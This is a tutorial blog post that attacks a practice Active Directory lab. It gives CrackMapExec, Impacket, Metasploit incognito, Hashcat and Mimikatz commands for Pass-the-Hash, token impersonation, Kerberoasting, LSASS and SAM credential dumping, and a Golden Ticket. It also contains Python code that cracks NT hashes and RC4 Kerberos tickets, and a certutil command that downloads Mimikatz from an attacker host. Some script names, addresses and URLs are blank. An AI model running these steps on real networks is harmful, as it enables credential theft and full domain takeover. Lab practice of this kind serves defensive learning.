AD Attack Lab Part Four (Pass The Hash, Token Impersonation, Kerberoasting, Mimikatz, and Golden Ticket attacks)


In this post, we will explore the Pass-The-Hash attack, Token Impersonation attack, Kerberoasting attack, Mimikatz attack, and Golden Ticket attack in an AD environment. If you haven’t set up the lab yet, follow Part One and Part Two to get your lab set up.

Pass The Hash Attack

Pass-The-Hash lets an attacker who has gained a foothold in a network authenticate as a user with nothing more than that user’s NTLM (NT) hash. NTLM authentication only proves possession of the hash, never the plain-text password, so a dumped hash is password-equivalent and does not need to be cracked. In practice the attacker dumps the NT hashes from a compromised machine (for example its local SAM database) and then sprays them across the network to find other hosts where the same accounts, and therefore the same hashes, are valid. Let us see how we can perform this attack in our lab environment.

I will use CrackMapExec and the “” script from Impacket for this lab. If you have not installed Impacket yet, head over to Part Two and install it on your Kali machine.

Install CrackMapExec

sudo python3 -m pip install pipx
sudo pipx ensurepath
sudo apt-get install python3-venv
sudo pipx install crackmapexec
sudo pipx ensurepath
sudo su


Pass The Password/Hashes With CrackMapExec

CrackMapExec lets us spray a plain-text password across a whole network range. We will use the plain-text password of the domain user “Beauden Wallis” (bwallis) that we created earlier against the whole network range. The scenario is that the credentials of domain user bwallis have been compromised, and the attacker wants to know which other workstations (and which accounts) accept this password.

crackmapexec smb -u bwallis -d KUDOS.local -p P@ssWord!


The green [+] next to each host shows that the credential we supplied authenticated to both workstations and the domain controller; CrackMapExec additionally marks a host with (Pwn3d!) when the account is a local administrator there, which is what dumping the SAM requires. Let’s dump the SAM database and get the hashes we need.

crackmapexec smb -u bwallis -d KUDOS.local -p P@ssWord! --sam


We can use the “” script from Impacket to get a SYSTEM shell with the credential we have for domain user “Beauden Wallis” (the target host follows the @): kudos.local/bwallis:P@ssWord\!@


The “” script from Impacket can also be used to dump the SAM database, one run per target host:
kudos.local/bwallis:P@ssWord\!@
kudos.local/bwallis:P@ssWord\!@


Save the user account hashes into a text file, one NT hash per line, so Hashcat can read them.


Let us see if we can crack the three hashes we obtained with Hashcat. Mode 1000 is NTLM (the NT hash):

hashcat -m 1000 hash-crack rockyou.txt --force


We see that only one of the three hashes cracks with the “rockyou.txt” wordlist: the local administrator account’s password. Now, let’s see whether the Pass-The-Hash technique lets us use the two uncracked hashes to gain access on the network anyway.

crackmapexec smb -u calcock -H 924572879ba3b163cc44e0abc5af208a --local-auth
crackmapexec smb -u bwallis -H cbe6872995bc342778fc13ce339770ea --local-auth

Impacket scripts take the hash as -hashes LMHASH:NTHASH; aad3b435b51404eeaad3b435b51404ee is the hash of an empty LM password, so only the NT half does any work:
PTH bwallis:@ -hashes aad3b435b51404eeaad3b435b51404ee:cbe6872995bc342778fc13ce339770ea

We can see that the hash of local user “bwallis” authenticates to “DESKTOP-USER1” and the hash of “calcock” authenticates to “DESKTOP-USER2”, without us ever learning either password. Now, let’s use “” with the hash in place of a password to pop a SYSTEM shell.


Token Impersonation Attack

Windows keeps an access token for every logged-on user, and a process running as SYSTEM can duplicate and impersonate those tokens. Token impersonation therefore lets an attacker with a SYSTEM-level foothold on a workstation act as any other user who has logged on there, for as long as that user’s logon session exists (until logoff or the next reboot). If a domain administrator is logged in to such a workstation, the attacker can impersonate the domain administrator and take over the whole domain.

Use “exploit/windows/smb/psexec” in Metasploit to get a Meterpreter shell on one of the Windows 10 machines.


Load the “incognito” module into the current Meterpreter session.

load incognito


List the tokens currently available for the logged-in accounts.

list_tokens -u


We can impersonate the account “bwallis” since that user is logged in.

impersonate_token KUDOS\\bwallis


We can drop back to our own token with “rev2self”. Note that while impersonating bwallis we do not have the access needed to dump the SAM database, because bwallis is only a regular domain user.


Once the domain administrator logs in to this workstation, a new administrator token becomes available for us to impersonate.


Kerberoasting Attack

Kerberoasting abuses the fact that any authenticated domain user can request a service ticket (TGS) for any account that has a Service Principal Name (SPN). The KDC encrypts part of that ticket with the service account’s password hash (with RC4-HMAC the key is the NT hash itself), so the attacker can take the ticket offline and brute-force the service account’s password without touching the service or the domain controller again. Nothing is forged or stolen here; the ticket is legitimately issued, which is why the request itself looks like normal Kerberos traffic.

Request a TGS for the SQL service account we set up earlier. The “” script is from the Impacket toolkit; “-request” makes it request the tickets rather than only list the SPNs: kudos.local/bwallis:P@ssWord\! -dc-ip -request


Identify the Hashcat mode for the ticket. A TGS-REP ticket encrypted with etype 23 (RC4-HMAC) is mode 13100:

hashcat --help | grep Kerb


I have made a wordlist for the purpose of this lab.


Crack the TGS (the hash lines produced above start with $krb5tgs$23$):

hashcat -m 13100 kerb-hash wordlists --force
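To make concrete what the two Hashcat runs on this page actually compute, here is an added example (not code from the original post) that serves both the Pass-The-Hash section and this Kerberoasting section. It implements the NT hash (MD4 over the UTF-16LE password, the value that --sam and the Impacket dump print), a hashcat -m 1000 style dictionary check over a dump, and the RC4-HMAC (etype 23) verification that hashcat -m 13100 performs on a Kerberoasted ticket. MD4 is written out because hashlib on OpenSSL 3 builds often cannot load it. The two local-user hashes are the ones quoted above; the Administrator entry, the wordlist, the “sqlservice” account, its SPN and the fake ticket body are constructed for the demo and are not from the lab.

```python
# Added example, not from the original post: NT hash, a hashcat -m 1000 style check,
# and the RC4-HMAC (etype 23) check behind hashcat -m 13100. All sample data below is
# constructed; the sqlservice account and its SPN are assumptions.
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF

def _rotl(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because OpenSSL 3 builds of hashlib often lack md4."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, X[] index order, shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [4 * (i % 4) + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = h[:]
        for f, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a, b, c, d = [(j - i) % 4 for j in range(4)]  # rotate a,b,c,d each step
                v[a] = _rotl(v[a] + f(v[b], v[c], v[d]) + X[k] + const, shifts[i % 4])
        h = [(x + y) & MASK for x, y in zip(h, v)]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    # NT hash = MD4(UTF-16LE(password)): the nt field of user:rid:lm:nt::: dump lines.
    # The lm field is normally the empty-password value aad3b435b51404eeaad3b435b51404ee.
    return md4(password.encode("utf-16-le"))

def crack_nt(dump: dict, wordlist) -> dict:
    # hashcat -m 1000 in miniature: each user -> first wordlist hit, or None.
    table = {nt_hash(w): w for w in wordlist}
    return {user: table.get(bytes.fromhex(nt)) for user, nt in dump.items()}

def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(nt: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    # RFC 4757 RC4-HMAC as the KDC applies it to a ticket enc-part (key usage 2).
    # The key is the service account's NT hash itself, which is why it cracks offline.
    ki = _hmac_md5(nt, struct.pack("<I", usage))
    checksum = _hmac_md5(ki, confounder + plaintext)
    return checksum + rc4(_hmac_md5(ki, checksum), confounder + plaintext)

def rc4_hmac_check(nt: bytes, usage: int, blob: bytes) -> bool:
    # One hashcat -m 13100 candidate test: decrypt with the candidate key, recompute the HMAC.
    ki = _hmac_md5(nt, struct.pack("<I", usage))
    checksum, edata = blob[:16], blob[16:]
    plain = rc4(_hmac_md5(ki, checksum), edata)
    return hmac.compare_digest(_hmac_md5(ki, plain), checksum)

def hashcat_13100_line(user: str, realm: str, spn: str, blob: bytes) -> str:
    # The $krb5tgs$23$ line format hashcat -m 13100 expects for an RC4-HMAC ticket.
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"

def crack_tgs(line: str, wordlist):
    # Parse a 13100 line; return the service account password if the wordlist has it.
    parts = line.split("$")
    if parts[1:3] != ["krb5tgs", "23"]:
        raise ValueError("only etype 23 (RC4-HMAC) tickets are handled here")
    blob = bytes.fromhex(parts[-2]) + bytes.fromhex(parts[-1])
    return next((w for w in wordlist if rc4_hmac_check(nt_hash(w), 2, blob)), None)

# Constructed sample: the two local NT hashes quoted in the post plus a made-up
# Administrator whose password is in the wordlist; only that one cracks.
SAM_DUMP = {
    "Administrator": "8846f7eaee8fb117ad06bdd830b7586c",  # nt_hash("password"), constructed
    "calcock": "924572879ba3b163cc44e0abc5af208a",
    "bwallis": "cbe6872995bc342778fc13ce339770ea",
}
WORDLIST = ["Winter2020!", "password", "letmein"]
# Constructed Kerberoast target: a fake enc-part (real ones are DER EncTicketPart) for an
# assumed sqlservice account, encrypted under the NT hash of its password.
SQL_SVC_PASSWORD = "MYpassword123#"
FAKE_TGS = rc4_hmac_encrypt(nt_hash(SQL_SVC_PASSWORD), 2, b"fake EncTicketPart", b"\x11" * 8)
KERB_LINE = hashcat_13100_line("sqlservice", "KUDOS.LOCAL", "MSSQLSvc/sql.kudos.local:1433", FAKE_TGS)
```

crack_nt(SAM_DUMP, WORDLIST) recovers only the constructed Administrator entry, mirroring the rockyou run above, and crack_tgs(KERB_LINE, WORDLIST + [SQL_SVC_PASSWORD]) recovers the service account password from the ticket alone. The important design point is in rc4_hmac_check: a candidate is confirmed purely by recomputing an HMAC over the decrypted ticket, so no contact with the KDC is needed per guess, and the cost per guess is one MD4 plus three HMAC-MD5 calls and an RC4 pass, which is why RC4 tickets are so much cheaper to roast than AES ones.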


Mimikatz and Golden Ticket Attack

Mimikatz can perform a wide variety of attacks related to Windows credentials and Kerberos tickets.

Download Mimikatz to Kali, serve it over HTTP, and then fetch it on the Domain Controller with certutil.

sudo python -m SimpleHTTPServer 80   # Python 2; with Python 3 use: sudo python3 -m http.server 80
certutil.exe -urlcache -f


Check that we are running Mimikatz with administrator privilege; “privilege::debug” must succeed before LSASS can be read.


Dump the logged-on users’ credentials from LSASS with “sekurlsa::logonpasswords”.



Try to dump the SAM database. It does not work because we are not running as SYSTEM, and the SAM hive is only readable by SYSTEM. In this case we can use psexec to get a SYSTEM shell and dump the SAM from there (“token::elevate” inside Mimikatz is another way to get a SYSTEM token).

lsadump::sam /patch


On the domain controller, “lsadump::lsa /patch” dumps the domain account hashes from LSASS rather than the local SAM:

lsadump::lsa /patch


We can also use Mimikatz to perform the golden ticket attack with the “krbtgt” account. A golden ticket is a forged TGT encrypted with the krbtgt account’s hash; because every TGT in the domain is validated with that key, the forged ticket lets us authenticate as any user to any computer in the domain, and it stays valid until the krbtgt password is changed (twice, since the previous key is still accepted).

Obtain the credentials for “krbtgt” account:

lsadump::lsa /inject /name:krbtgt


Generate our golden ticket and inject it into the current session (/ptt). Note the NT hash and the domain SID we obtained when dumping the “krbtgt” account; the SID is the domain SID without the trailing RID.

kerberos::golden /User:Administrator /domain:kudos.local /sid:S-1-5-21-1510980245-1658837649-3915912440 /krbtgt:91829003942208c879f83073fb387c5f /id:500 /ptt


Open a command prompt that inherits the injected TGT (“misc::cmd” in Mimikatz); from it we can reach any computer in the domain:

dir \\DESKTOP-USER2\c$


We examined several interesting attacks against the misconfigured AD environment. In future posts, I will discuss how we can detect these attacks. Thanks for reading :)